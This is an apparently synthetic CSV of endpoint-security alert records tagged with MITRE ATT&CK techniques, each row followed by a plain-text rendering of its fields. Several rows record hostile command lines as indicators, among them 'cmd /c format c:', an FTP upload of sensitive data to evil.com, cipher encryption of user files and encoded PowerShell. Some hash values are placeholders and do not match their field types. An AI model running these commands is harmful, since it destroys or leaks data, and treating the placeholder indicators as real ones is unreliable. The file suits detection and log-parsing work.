12345,threat detection,1646842350000,Data Encrypted for Impact,Data Encrypted for Impact detected on endpoint,,,,,,high,,,,,,,,,,,,,,,,,,,,,1.0,"{'hostname': 'example-hostname', 'user_name': 'example-user', 'timestamp_utc': '2022-03-08T15:12:30.000Z', 'mitre_attack_id': 'T1486', 'mitre_attack_name': 'Data Encrypted for Impact', 'threat_score': 100, 'threat_indicators': [{'indicator_type': 'file_path', 'indicator_value': 'C:\\Users\\example-user\\Documents\\example-file.txt', 'indicator_description': 'Path of the file that was encrypted'}, {'indicator_type': 'file_hash', 'indicator_value': '1234567890ABCDEF1234567890ABCDEF12345678', 'indicator_description': 'SHA-1 hash of the file that was encrypted'}, {'indicator_type': 'command_line', 'indicator_value': 'cmd /c cipher /e /a /s:C:\\Users\\example-user\\Documents\\example-file.txt', 'indicator_description': 'Command line used for data encryption'}]}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"event_id is 12345. event_type is threat detection. event_timestamp is 1646842350000. event_category is Data Encrypted for Impact. event_description is Data Encrypted for Impact detected on endpoint. event_severity is high. event_data hostname is example-hostname. event_data user_name is example-user. event_data timestamp_utc is 2022-03-08T15:12:30.000Z. event_data mitre_attack_id is T1486. event_data mitre_attack_name is Data Encrypted for Impact. event_data threat_indicators is {'indicator_type': 'file_path', 'indicator_value': 'C:\\Users\\example-user\\Documents\\example-file.txt', 'indicator_description': 'Path of the file that was encrypted'}. event_data threat_indicators is {'indicator_type': 'file_hash', 'indicator_value': '1234567890ABCDEF1234567890ABCDEF12345678', 'indicator_description': 'SHA-1 hash of the file that was encrypted'}. event_data threat_indicators is {'indicator_type': 'command_line', 'indicator_value': 'cmd /c cipher /e /a /s:C:\\Users\\example-user\\Documents\\example-file.txt', 'indicator_description': 'Command line used for data encryption'}. "
0304050f,,2023-03-09T10:30:15.000000Z,Suspicious data manipulation,Suspicious data manipulation activity or Data Obfuscation detected,high,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"{'threat_name': 'MITRE T1001 - Data Obfuscation', 'ioc': ['http://maliciousdomain.com', '8.8.8.8'], 'process_name': 'powershell.exe', 'process_pid': 1234, 'parent_process_name': 'explorer.exe', 'parent_process_pid': 5678, 'user_name': 'User1', 'domain_name': 'contoso', 'mitre_id': 'T1001'}",,"{'type': 'endpoint', 'hostname': 'DESKTOP-J2345', 'ip_address': '192.168.1.100'}","{'type': 'file', 'file_path': 'C:\\Users\\User1\\Documents\\sensitive.doc', 'hash': '4ab07e2b96a7b38f1bbceb31e313b023'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 0304050f. event_timestamp is 2023-03-09T10:30:15.000000Z. event_category is Suspicious data manipulation. event_description is Suspicious data manipulation activity or Data Obfuscation detected. severity is high. details threat_name is MITRE T1001 - Data Obfuscation. details ioc is http://maliciousdomain.com. details ioc is 8.8.8.8. details process_name is powershell.exe. details parent_process_name is explorer.exe. details user_name is User1. details domain_name is contoso. details mitre_id is T1001. source type is endpoint. source hostname is DESKTOP-J2345. source ip_address is 192.168.1.100. target type is file. target file_path is C:\Users\User1\Documents\sensitive.doc. target hash is 4ab07e2b96a7b38f1bbceb31e313b023. 
123456789,threat detection,2022-03-07T12:30:00Z,Data transfer size limits,Data transfer size limits were exceeded on endpoint,,,,,,high,,,,,,,192.168.1.100,,,,,,,,,,,,,,,,,,,,,Data Transfer Size Limits Detected,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"[{'entity_type': 'Endpoint', 'entity_name': 'Endpoint001', 'os': 'Windows 10', 'username': 'User001'}]",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 123456789. event_type is threat detection. event_timestamp is 2022-03-07T12:30:00Z. event_category is Data transfer size limits. event_description is Data transfer size limits were exceeded on endpoint. event_severity is high. src_ip is 192.168.1.100. event_subtype is Data Transfer Size Limits Detected. affected_entities entity_type is Endpoint. affected_entities entity_name is Endpoint001. affected_entities os is Windows 10. affected_entities username is User001. 
03040450fjk,threat_detection,2023-03-10T12:00:00Z,defense evasion,The process %process_name% attempted to evade detection by a debugger.,,,,,,high,,,,,,Debugger Evasion,,,,,,,,,,,,,,,,,Debugger Evasion Detected,,,,Investigate the process %process_name% for signs of malicious activity.,,,,,,,,,,,,,,,,,,,,,,Defense Evasion,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 03040450fjk. event_type is threat_detection. event_timestamp is 2023-03-10T12:00:00Z. event_category is defense evasion. event_description is The process %process_name% attempted to evade detection by a debugger.. event_severity is high. technique is Debugger Evasion. event_name is Debugger Evasion Detected. recommendation is Investigate the process %process_name% for signs of malicious activity.. tactic is Defense Evasion. 
12345,DetectionSummaryEvent,1646749655000,Disk Wiping,Potential disk wiping activity was detected on the device.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,high,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,123456.0,"{'HostInfo': {'HostName': 'example-device', 'OsType': 'Windows', 'OsVersion': '10.0.19042', 'IpAddress': '192.168.1.100', 'MacAddress': '00-11-22-33-44-55', 'Domain': 'example.com', 'UserName': 'user123'}, 'ProcessInfo': {'ProcessName': 'cmd.exe', 'ProcessCommandLine': 'cmd /c format c:', 'ProcessStartTime': '2022-03-20T15:40:00Z', 'ProcessParentName': 'explorer.exe', 'ProcessParentCommandLine': 'explorer.exe', 'ProcessParentStartTime': '2022-03-20T15:30:00Z'}, 'TargetInfo': {'HostName': 'example-device2', 'OsType': 'Windows', 'OsVersion': '10.0.19042', 'UserName': 'user456'}, 'RuleName': 'Disk Wiping Detection', 'RuleId': '789012'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 12345. event_type is DetectionSummaryEvent. event_timestamp is 1646749655000. event_category is Disk Wiping. event_description is Potential disk wiping activity was detected on the device.. Severity is high. Details HostInfo HostName is example-device. Details HostInfo OsType is Windows. Details HostInfo OsVersion is 10.0.19042. Details HostInfo IpAddress is 192.168.1.100. Details HostInfo MacAddress is 00-11-22-33-44-55. Details HostInfo Domain is example.com. Details HostInfo UserName is user123. Details ProcessInfo ProcessName is cmd.exe. Details ProcessInfo ProcessCommandLine is cmd /c format c:. Details ProcessInfo ProcessStartTime is 2022-03-20T15:40:00Z. Details ProcessInfo ProcessParentName is explorer.exe. Details ProcessInfo ProcessParentCommandLine is explorer.exe. Details ProcessInfo ProcessParentStartTime is 2022-03-20T15:30:00Z. Details TargetInfo HostName is example-device2. Details TargetInfo OsType is Windows. Details TargetInfo OsVersion is 10.0.19042. Details TargetInfo UserName is user456. Details RuleName is Disk Wiping Detection. Details RuleId is 789012. 
nfkskfjs,threat_detection,1646947200,policy_modification,A domain policy was modified on the endpoint,,,,,,high,,"{'affected_entities': [{'entity_type': 'domain_policy', 'entity_name': 'example-policy'}]}",,,,,,,,,,,,,,,,,,,1.0,,,"{'hostname': 'example-host', 'ip_address': '192.168.1.1', 'operating_system': 'Windows 10'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,detect,endpoint,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"event_id is nfkskfjs. event_type is threat_detection. event_timestamp is 1646947200. event_category is policy_modification. event_description is A domain policy was modified on the endpoint. event_severity is high. event_details affected_entities is {'entity_type': 'domain_policy', 'entity_name': 'example-policy'}. endpoint hostname is example-host. endpoint ip_address is 192.168.1.1. endpoint operating_system is Windows 10. event_action is detect. event_source is endpoint. "
12345,threat detection,1646749655000,data exfiltration,Exfiltration Over Other Network Medium Detected,high,,,,,,,,detect,,,,,,"{'name': 'FTP', 'direction': 'outbound'}",,explorer.exe,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ABC123,DESKTOP-ABC123,192.168.1.100,JohnDoe,DOMAIN,explorer.exe ftp://evil.com/SensitiveData.txt,1234.0,,,,"[{'name': 'SensitiveData.txt', 'type': 'exfiltrated'}]",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 12345. event_type is threat detection. event_timestamp is 1646749655000. event_category is data exfiltration. event_description is Exfiltration Over Other Network Medium Detected. severity is high. action is detect. protocol name is FTP. protocol direction is outbound. process_name is explorer.exe. sensor_id is ABC123. hostname is DESKTOP-ABC123. ip is 192.168.1.100. user is JohnDoe. domain is DOMAIN. process_command_line is explorer.exe ftp://evil.com/SensitiveData.txt. files name is SensitiveData.txt. files type is exfiltrated. 
304596987,Exploit Public-Facing Application,2022-12-31T23:59:59Z,exploit public facing application,Exploit Public-Facing Application detected and blocked,high,,,,"{'id': 'host456', 'name': 'myserver.example.com', 'os': 'Windows', 'ip_address': '192.168.1.1'}",,,,blocked,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"{'id': 'user123', 'name': 'John Smith'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,new,"{'name': 'HTTP Server', 'version': '2.0'}","{'name': 'CVE-2022-1234', 'type': 'exploit', 'source': 'unknown', 'indicators': [{'id': 'indicator123', 'type': 'file_hash', 'value': 'abc123def456', 'description': 'Hash of malicious file'}]}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"event_id is 304596987. event_type is Exploit Public-Facing Application. event_timestamp is 2022-12-31T23:59:59Z. event_category is exploit public facing application. event_description is Exploit Public-Facing Application detected and blocked. severity is high. host id is host456. host name is myserver.example.com. host os is Windows. host ip_address is 192.168.1.1. action is blocked. user id is user123. user name is John Smith. status is new. application name is HTTP Server. application version is 2.0. threat name is CVE-2022-1234. threat type is exploit. threat source is unknown. threat indicators is {'id': 'indicator123', 'type': 'file_hash', 'value': 'abc123def456', 'description': 'Hash of malicious file'}. "
123456,alert,,Ingress Tool Transfer,Potential ingress tool transfer detected,medium,2023-03-09T12:00:00.000000Z,,,,,,,,,,,,,,,powershell.exe,Ingress Tool Transfer,,,,powershell.exe -NoProfile -ExecutionPolicy unrestricted -EncodedCommand ,,,,,,,,,,,,,,,,,,192.168.1.100,10.0.2.15,,,,,,,,,,,,,,Initial Access,,5678.0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,443.0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,MITRE T1105,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,57234.0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 123456. event_type is alert. event_category is Ingress Tool Transfer. event_description is Potential ingress tool transfer detected. severity is medium. event_time is 2023-03-09T12:00:00.000000Z. process_name is powershell.exe. technique_name is Ingress Tool Transfer. command_line is powershell.exe -NoProfile -ExecutionPolicy unrestricted -EncodedCommand . source_ip is 192.168.1.100. destination_ip is 10.0.2.15. tactic is Initial Access. alert_rule_name is MITRE T1105. 
002040g,detect,2023-03-10T20:00:00Z,file_write,An attempt to modify the system's disk image or firmware.,critical,,,,{'hostname': 'server01'},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,{'reason': 'Unauthorized modification of system file'},,,,,,,,,,,,,,,,,,,,,{'username': 'system'},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"{'file_path': 'C:\\Windows\\System32\\ntoskrnl.exe', 'file_sha256': '4a4bfcf2b926c387b7d9c9ea9ca95e3e3a67f5d6d0c6b3a3f3c6b5d5e5f0f0f0', 'file_size': 1683456}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 002040g. event_type is detect. event_timestamp is 2023-03-10T20:00:00Z. event_category is file_write. event_description is An attempt to modify the system's disk image or firmware.. severity is critical. host hostname is server01. detection reason is Unauthorized modification of system file. user username is system. file_write file_path is C:\Windows\System32\ntoskrnl.exe. file_write file_sha256 is 4a4bfcf2b926c387b7d9c9ea9ca95e3e3a67f5d6d0c6b3a3f3c6b5d5e5f0f0f0. 
3050603d,,2023-03-09T12:00:00.000000Z,command and control,Non-Application Layer Protocol,,,,,,high,,,,,,Non-Application Layer Protocol,,,UDP,,nslookup.exe,,,,,,,C:\Windows\System32\cmd.exe,,,,,,,,,,,,,,,,192.168.1.100,10.0.0.2,,,,,,,,,,,,,,Command and Control,,1234.0,,,,,,,,DOMAIN\user,,C:\Windows\System32\nslookup.exe example.com,,cmd.exe,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,53.0,5678.0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 3050603d. event_timestamp is 2023-03-09T12:00:00.000000Z. event_category is command and control. event_description is Non-Application Layer Protocol. event_severity is high. technique is Non-Application Layer Protocol. protocol is UDP. process_name is nslookup.exe. parent_process_command_line is C:\Windows\System32\cmd.exe. source_ip is 192.168.1.100. destination_ip is 10.0.0.2. tactic is Command and Control. user is DOMAIN\user. process_command_line is C:\Windows\System32\nslookup.exe example.com. parent_process_name is cmd.exe. 
030333333,,2023-03-10T10:30:00Z,Obfuscated Files or Information,A suspicious file has been detected that appears to be obfuscated or encoded.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,High,,hostname123,C:\Program Files\Malware\malware.exe,CrowdStrike Falcon,Isolate the affected host and perform a forensic analysis of the file to determine the nature and purpose of the obfuscation.,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 030333333. event_timestamp is 2023-03-10T10:30:00Z. event_category is Obfuscated Files or Information. event_description is A suspicious file has been detected that appears to be obfuscated or encoded.. Severity is High. Affected_Hostname is hostname123. Affected_File_Path is C:\Program Files\Malware\malware.exe. Alert_Source is CrowdStrike Falcon. Recommendation is Isolate the affected host and perform a forensic analysis of the file to determine the nature and purpose of the obfuscation.. 
095030332,RemovableMediaDetection,2022-03-04T10:25:00Z,External Media Replication,An external device has been detected that may be attempting to replicate data to the endpoint.,high,,,,,,,,,,,,,,,,,Replication Through Removable Media,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Initial Access,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,USB Device,SanDisk,USB flash drive,123456.0,16 GB,2022-03-04T10:25:00Z,Copied Files,C:\Users\User\Documents\SensitiveData.docx,2 MB,T1091,{'type': 'Endpoint Monitoring'},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 095030332. event_type is RemovableMediaDetection. event_timestamp is 2022-03-04T10:25:00Z. event_category is External Media Replication. event_description is An external device has been detected that may be attempting to replicate data to the endpoint.. severity is high. technique_name is Replication Through Removable Media. tactic is Initial Access. RemovableMediaName is USB Device. RemovableMediaVendor is SanDisk. RemovableMediaType is USB flash drive. RemovableMediaCapacity is 16 GB. RemovableMediaAccessedTime is 2022-03-04T10:25:00Z. RemovableMediaAction is Copied Files. AffectedFilePath is C:\Users\User\Documents\SensitiveData.docx. AffectedFileSize is 2 MB. technique_id is T1091. event_creator type is Endpoint Monitoring. 
ABC123-1234-5678-9101-23456789,threat_detection,2022-03-07T14:23:54.123Z,resource hijacking,An attempt to hijack system resources has been detected on the endpoint.,,,,,,critical,,,,,,Resource Hijacking,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Resource Hijacking,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"[{'type': 'host', 'id': '123456', 'name': 'DESKTOP-1234', 'ip_addresses': ['192.168.1.100'], 'os_type': 'Windows'}]",,,,,,,,,,,,,,A suspicious process is attempting to hijack system resources on the endpoint.,,,,,,,,,,,,,,,,,,,,,,,"{'process_name': 'explorer.exe', 'target_resource': 'memory', 'operation': 'write', 'suspicious_action': 'attempt to overwrite critical memory region'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,T1496,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is ABC123-1234-5678-9101-23456789. event_type is threat_detection. event_timestamp is 2022-03-07T14:23:54.123Z. event_category is resource hijacking. event_description is An attempt to hijack system resources has been detected on the endpoint.. event_severity is critical. technique is Resource Hijacking. tactic is Resource Hijacking. affected_entities type is host. affected_entities id is 123456. affected_entities name is DESKTOP-1234. affected_entities ip_addresses is ['192.168.1.100']. affected_entities os_type is Windows. description is A suspicious process is attempting to hijack system resources on the endpoint.. additional_info process_name is explorer.exe. additional_info target_resource is memory. additional_info operation is write. additional_info suspicious_action is attempt to overwrite critical memory region. technique_id is T1496. 
12345678-1234-1234-1234-123456789012,alert,2023-03-08T14:30:00Z,scheduled Transfer,Scheduled Transfer Detected,,,,,,medium,,,,,,,,,,,cmd.exe,,,,,robocopy C:\LocalFolder \\RemoteServer\Share /E,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1234.0,,,,,,,,,,,,,,,,CrowdStrike Falcon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,\\RemoteServer\Share,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 12345678-1234-1234-1234-123456789012. event_type is alert. event_timestamp is 2023-03-08T14:30:00Z. event_category is scheduled Transfer. event_description is Scheduled Transfer Detected. event_severity is medium. process_name is cmd.exe. command_line is robocopy C:\LocalFolder \\RemoteServer\Share /E. detection_source is CrowdStrike Falcon. remote_server is \\RemoteServer\Share. 
0930405555,detect,2023-03-03T10:15:30Z,serverless execution,Potential serverless execution detected via PowerShell execution with encoded command.,,,,,,high,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"{'process_name': 'powershell.exe', 'process_command_line': '-EncodedCommand', 'parent_process_name': 'cmd.exe', 'parent_command_line': 'powershell.exe -encodedCommand', 'process_sha256': '9D73B2CF2A1C728FE8B282FDC7EE5DE5', 'parent_sha256': '2E20D26F9C1ACB5547D5BDA70FEBD054', 'status': 'blocked'}",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 0930405555. event_type is detect. event_timestamp is 2023-03-03T10:15:30Z. event_category is serverless execution. event_description is Potential serverless execution detected via PowerShell execution with encoded command.. event_severity is high. process process_name is powershell.exe. process process_command_line is -EncodedCommand. process parent_process_name is cmd.exe. process parent_command_line is powershell.exe -encodedCommand. process process_sha256 is 9D73B2CF2A1C728FE8B282FDC7EE5DE5. process parent_sha256 is 2E20D26F9C1ACB5547D5BDA70FEBD054. process status is blocked. 
12345678-1234-1234-1234-123456789012,alert,2023-03-08T14:30:00Z,transfer data to cloud,Data Transfer to Cloud Account Detected,,,,,,high,,,,,,,,,,,powershell.exe,,,,,Copy-Item C:\LocalFolder -Destination https://mycloudstorage.com/myfolder,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,5678.0,,,,,,,,,,,,,,,,CorwdStrike Falcon,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,T1537,https://mycloudstorage.com,,,,,,,,,,,,,,,,,,,,,,,,,,,,event_id is 12345678-1234-1234-1234-123456789012. event_type is alert. event_timestamp is 2023-03-08T14:30:00Z. event_category is transfer data to cloud. event_description is Data Transfer to Cloud Account Detected. event_severity is high. process_name is powershell.exe. command_line is Copy-Item C:\LocalFolder -Destination https://mycloudstorage.com/myfolder. detection_source is CorwdStrike Falcon. mitre_attack_id is T1537. cloud_account is https://mycloudstorage.com. 
04040t0y,threat detection,,Suspicious Use of Valid Accounts Detected,Suspicious activity involving the use of valid accounts was detected on an endpoint.,high,2023-03-03T15:30:00Z,,,,,,,,,,,,,,,,,,,,,,,,,2.0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,suspicious_activity,,,,,,,,,,,,,"[{'kill_chain_name': 'mitre-attack', 'phase_name': 'command-and-control'}]",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,12345.0,valid_accounts,"{'provider': 'Crowdstrike Falcon', 'type': 'endpoint_detection_and_response'}",,,,,,,,,,,,,,,,,,,,,,,,,event_id is 04040t0y. event_type is threat detection. event_category is Suspicious Use of Valid Accounts Detected. event_description is Suspicious activity involving the use of valid accounts was detected on an endpoint.. severity is high. event_time is 2023-03-03T15:30:00Z. type is suspicious_activity. kill_chain_phases kill_chain_name is mitre-attack. kill_chain_phases phase_name is command-and-control. event_event_name is valid_accounts. data_source provider is Crowdstrike Falcon. data_source type is endpoint_detection_and_response. 
98765,Build image on host,2023-03-10T10:30:00Z,removable_media,,high,,,,,,,,,"A removable media device was inserted and a file transfer occurred, which is commonly associated with data exfiltration or other suspicious activity.",789012.0,Communication Through Removable Media,,,,user1,explorer.exe,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,USB Drive,confidential.docx,3.5MB,D:\confidential.docx,C:\Users\user1\Documents\confidential.docx,,,,,,,,,,,,,,,,,,,,"event_id is 98765. event_type is Build image on host. event_timestamp is 2023-03-10T10:30:00Z. event_category is removable_media. severity is high. detect_description is A removable media device was inserted and a file transfer occurred, which is commonly associated with data exfiltration or other suspicious activity.. technique is Communication Through Removable Media. user_name is user1. process_name is explorer.exe. device_name is USB Drive. file_name is confidential.docx. file_size is 3.5MB. src_path is D:\confidential.docx. dst_path is C:\Users\user1\Documents\confidential.docx. "
12345,alert,1646749655000,suspicous container,"A container has been deployed on the system, potentially indicating malicious activity.",High,,,,,,,,,,,Deploy Container,,,,john.doe,docker,,,,,docker run malicious/image,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Defense Evasion,192.168.1.100,5678.0,,,2023-03-10T10:00:00Z,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,1234.0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,example.com,/usr/bin/docker,f1ef997989e37c17eb2a12d56a9ac05d,098f6bcd4621d373cade4e832627b4f6,,,,,,,,,,,,,,,,"event_id is 12345. event_type is alert. event_timestamp is 1646749655000. event_category is suspicous container. event_description is A container has been deployed on the system, potentially indicating malicious activity.. severity is High. technique is Deploy Container. user_name is john.doe. process_name is docker. command_line is docker run malicious/image. tactic is Defense Evasion. ip_address is 192.168.1.100. timestamp is 2023-03-10T10:00:00Z. host_name is example.com. file_path is /usr/bin/docker. md5_hash is f1ef997989e37c17eb2a12d56a9ac05d. sha256_hash is 098f6bcd4621d373cade4e832627b4f6. "
